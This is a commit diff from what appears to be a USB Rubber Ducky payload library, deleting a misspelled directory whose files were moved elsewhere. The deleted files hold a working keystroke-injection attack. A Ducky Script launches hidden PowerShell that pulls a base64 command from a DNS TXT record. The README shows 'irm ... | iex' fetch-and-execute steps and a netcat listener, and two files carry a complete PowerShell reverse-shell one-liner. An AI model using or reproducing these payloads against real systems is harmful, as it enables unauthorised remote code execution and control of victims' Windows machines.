Delete payloads/library/execution/DNS-TXT-CommandInection directory
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection direcotorypull/468/head
parent
7c989706cc
commit
1fd0843049
|
@ -1,175 +0,0 @@
|
||||||
# VSCode
|
|
||||||
.vscode/*
|
|
||||||
!.vscode/settings.json
|
|
||||||
!.vscode/tasks.json
|
|
||||||
!.vscode/launch.json
|
|
||||||
!.vscode/extensions.json
|
|
||||||
*.code-workspace
|
|
||||||
# Local History for <a href="https://www.jcchouinard.com/python-with-vscode/">Visual Studio Code</a>
|
|
||||||
.history/
|
|
||||||
|
|
||||||
# Common credential files
|
|
||||||
**/credentials.json
|
|
||||||
**/client_secrets.json
|
|
||||||
**/client_secret.json
|
|
||||||
*creds*
|
|
||||||
*.dat
|
|
||||||
*password*
|
|
||||||
*.httr-oauth*
|
|
||||||
|
|
||||||
# Private Node Modules
|
|
||||||
node_modules/
|
|
||||||
creds.js
|
|
||||||
|
|
||||||
# Private Files
|
|
||||||
*.json
|
|
||||||
*.csv
|
|
||||||
*.csv.gz
|
|
||||||
*.tsv
|
|
||||||
*.tsv.gz
|
|
||||||
*.xlsx
|
|
||||||
|
|
||||||
|
|
||||||
# Mac/OSX
|
|
||||||
.DS_Store
|
|
||||||
|
|
||||||
|
|
||||||
# Byte-compiled / optimized / DLL files
|
|
||||||
__pycache__/
|
|
||||||
*.py[cod]
|
|
||||||
*$py.class
|
|
||||||
|
|
||||||
# C extensions
|
|
||||||
*.so
|
|
||||||
|
|
||||||
# Distribution / packaging
|
|
||||||
.Python
|
|
||||||
build/
|
|
||||||
develop-eggs/
|
|
||||||
dist/
|
|
||||||
downloads/
|
|
||||||
eggs/
|
|
||||||
.eggs/
|
|
||||||
lib/
|
|
||||||
lib64/
|
|
||||||
parts/
|
|
||||||
sdist/
|
|
||||||
var/
|
|
||||||
wheels/
|
|
||||||
share/python-wheels/
|
|
||||||
*.egg-info/
|
|
||||||
.installed.cfg
|
|
||||||
*.egg
|
|
||||||
MANIFEST
|
|
||||||
|
|
||||||
# PyInstaller
|
|
||||||
# Usually these files are written by a <a href="https://www.jcchouinard.com/learn-python/">python</a> script from a template
|
|
||||||
# before PyInstaller builds the exe, so as to inject date/other infos into it.
|
|
||||||
*.manifest
|
|
||||||
*.spec
|
|
||||||
|
|
||||||
# Installer logs
|
|
||||||
pip-log.txt
|
|
||||||
pip-delete-this-directory.txt
|
|
||||||
|
|
||||||
# Unit test / coverage reports
|
|
||||||
htmlcov/
|
|
||||||
.tox/
|
|
||||||
.nox/
|
|
||||||
.coverage
|
|
||||||
.coverage.*
|
|
||||||
.cache
|
|
||||||
nosetests.xml
|
|
||||||
coverage.xml
|
|
||||||
*.cover
|
|
||||||
*.py,cover
|
|
||||||
.hypothesis/
|
|
||||||
.pytest_cache/
|
|
||||||
cover/
|
|
||||||
|
|
||||||
# Translations
|
|
||||||
*.mo
|
|
||||||
*.pot
|
|
||||||
|
|
||||||
# Django stuff:
|
|
||||||
*.log
|
|
||||||
local_settings.py
|
|
||||||
db.sqlite3
|
|
||||||
db.sqlite3-journal
|
|
||||||
|
|
||||||
# Flask stuff:
|
|
||||||
instance/
|
|
||||||
.webassets-cache
|
|
||||||
|
|
||||||
# Scrapy stuff:
|
|
||||||
.scrapy
|
|
||||||
|
|
||||||
# Sphinx documentation
|
|
||||||
docs/_build/
|
|
||||||
|
|
||||||
# PyBuilder
|
|
||||||
.pybuilder/
|
|
||||||
target/
|
|
||||||
|
|
||||||
# <a href="https://www.jcchouinard.com/how-to-use-jupyter-notebook/">Jupyter Notebook</a>
|
|
||||||
.ipynb_checkpoints
|
|
||||||
|
|
||||||
# IPython
|
|
||||||
profile_default/
|
|
||||||
ipython_config.py
|
|
||||||
|
|
||||||
# pyenv
|
|
||||||
# For a library or package, you might want to ignore these files since the code is
|
|
||||||
# intended to run in multiple environments; otherwise, check them in:
|
|
||||||
# .python-version
|
|
||||||
|
|
||||||
# pipenv
|
|
||||||
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in <a href="https://www.jcchouinard.com/version-control/">version control.</a>
|
|
||||||
# However, in case of collaboration, if having platform-specific dependencies or dependencies
|
|
||||||
# having no cross-platform support, pipenv may install dependencies that don't work, or not
|
|
||||||
# install all needed dependencies.
|
|
||||||
#Pipfile.lock
|
|
||||||
|
|
||||||
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
|
|
||||||
__pypackages__/
|
|
||||||
|
|
||||||
# Celery stuff
|
|
||||||
celerybeat-schedule
|
|
||||||
celerybeat.pid
|
|
||||||
|
|
||||||
# SageMath parsed files
|
|
||||||
*.sage.py
|
|
||||||
|
|
||||||
# Environments
|
|
||||||
.env
|
|
||||||
.venv
|
|
||||||
env/
|
|
||||||
venv/
|
|
||||||
ENV/
|
|
||||||
env.bak/
|
|
||||||
venv.bak/
|
|
||||||
|
|
||||||
# <a href="https://www.jcchouinard.com/python-with-spyder-ide/">Spyder</a> project settings
|
|
||||||
.spyderproject
|
|
||||||
.spyproject
|
|
||||||
|
|
||||||
# Rope project settings
|
|
||||||
.ropeproject
|
|
||||||
|
|
||||||
# mkdocs documentation
|
|
||||||
/site
|
|
||||||
|
|
||||||
# mypy
|
|
||||||
.mypy_cache/
|
|
||||||
.dmypy.json
|
|
||||||
dmypy.json
|
|
||||||
|
|
||||||
# Pyre type checker
|
|
||||||
.pyre/
|
|
||||||
|
|
||||||
# pytype static type analyzer
|
|
||||||
.pytype/
|
|
||||||
|
|
||||||
# Cython debug symbols
|
|
||||||
cython_debug/
|
|
||||||
|
|
|
@ -1,38 +0,0 @@
|
||||||
REM Title: DNS-TXT-CommandInjection
|
|
||||||
REM Author: Nate
|
|
||||||
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
|
|
||||||
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
|
|
||||||
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
|
|
||||||
REM and an example of creating your DNS TXT record in AWS Route53 service.
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
REM Props: Hak5, Darren Kitchen, Korben
|
|
||||||
REM Version: 1.0
|
|
||||||
REM Category: Execution
|
|
||||||
|
|
||||||
REM CONFIGURATION
|
|
||||||
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
|
|
||||||
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
|
|
||||||
REM reverseshell.
|
|
||||||
REM REQUIRED A listener for incoming connections like netcat.
|
|
||||||
REM REQUIRED - Provide URL used for Example
|
|
||||||
DEFINE #MY_TARGET_URL example.com
|
|
||||||
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
|
||||||
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
|
|
||||||
|
|
||||||
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
|
|
||||||
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
|
|
||||||
REM into DNS TXT record.
|
|
||||||
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
|
|
||||||
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
|
|
||||||
|
|
||||||
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
|
|
||||||
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
|
|
||||||
REM The link below has the Powershell script to convert your payloads to Base64.
|
|
||||||
REM https://https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1
|
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
|
||||||
DELAY 1000
|
|
||||||
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
|
@ -1,49 +0,0 @@
|
||||||
# DNS-TXT-CommandInjection
|
|
||||||
Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
|
|
||||||
## Description
|
|
||||||
A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
|
|
||||||
## Requirements
|
|
||||||
A domain with the ability to manipulate the DNS TXT records.
|
|
||||||
Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
|
|
||||||
A listener for incoming connections like netcat.
|
|
||||||
Provide URL used for Example
|
|
||||||
DEFINE #MY_TARGET_URL example.com
|
|
||||||
|
|
||||||
## Notes
|
|
||||||
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
|
|
||||||
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
|
|
||||||
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
|
|
||||||
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
|
|
||||||
## Windows Commands (used in payload)
|
|
||||||
### Execute DNS TXT Payload
|
|
||||||
```Powershell
|
|
||||||
powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
|
||||||
```
|
|
||||||
### Execute web hosted Powershell Reverseshell
|
|
||||||
```Powershell
|
|
||||||
irm http://MY_TARGET_URL/T1.txt | iex
|
|
||||||
```
|
|
||||||
### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
|
|
||||||
```Powershell
|
|
||||||
.\powershellReverseShellOne-liner.ps1
|
|
||||||
```
|
|
||||||
### Convert payload to base64
|
|
||||||
```Powershell
|
|
||||||
.\convertBase64.ps1
|
|
||||||
```
|
|
||||||
### Alternative to executing Powershell Script
|
|
||||||
```Powershell
|
|
||||||
gc -raw .\convertBase64.ps1 | iex
|
|
||||||
```
|
|
||||||
## Linux Commands
|
|
||||||
```bash
|
|
||||||
nc -lvnp 1337
|
|
||||||
```
|
|
||||||
### Links
|
|
||||||
|
|
||||||
[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
|
|
||||||
|
|
||||||
[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1)
|
|
||||||
|
|
||||||
[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)
|
|
||||||
|
|
|
@ -1,5 +0,0 @@
|
||||||
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
|
|
||||||
# CONFIGURATION
|
|
||||||
# REQUIRED - Provide IP and Port used for Example
|
|
||||||
# DEFINE #MY_TARGET_IP and Port after TCPClient(
|
|
||||||
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
|
|
@ -1,4 +0,0 @@
|
||||||
$text = Read-Host -prompt "What would you like to encode"
|
|
||||||
$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
|
|
||||||
echo $base64Text
|
|
||||||
|
|
|
@ -1,6 +0,0 @@
|
||||||
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
|
|
||||||
# CONFIGURATION
|
|
||||||
# REQUIRED - Provide IP and Port used for Example
|
|
||||||
# DEFINE #MY_TARGET_IP and Port after TCPClient(
|
|
||||||
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
|
||||||
|
|
Loading…
Reference in New Issue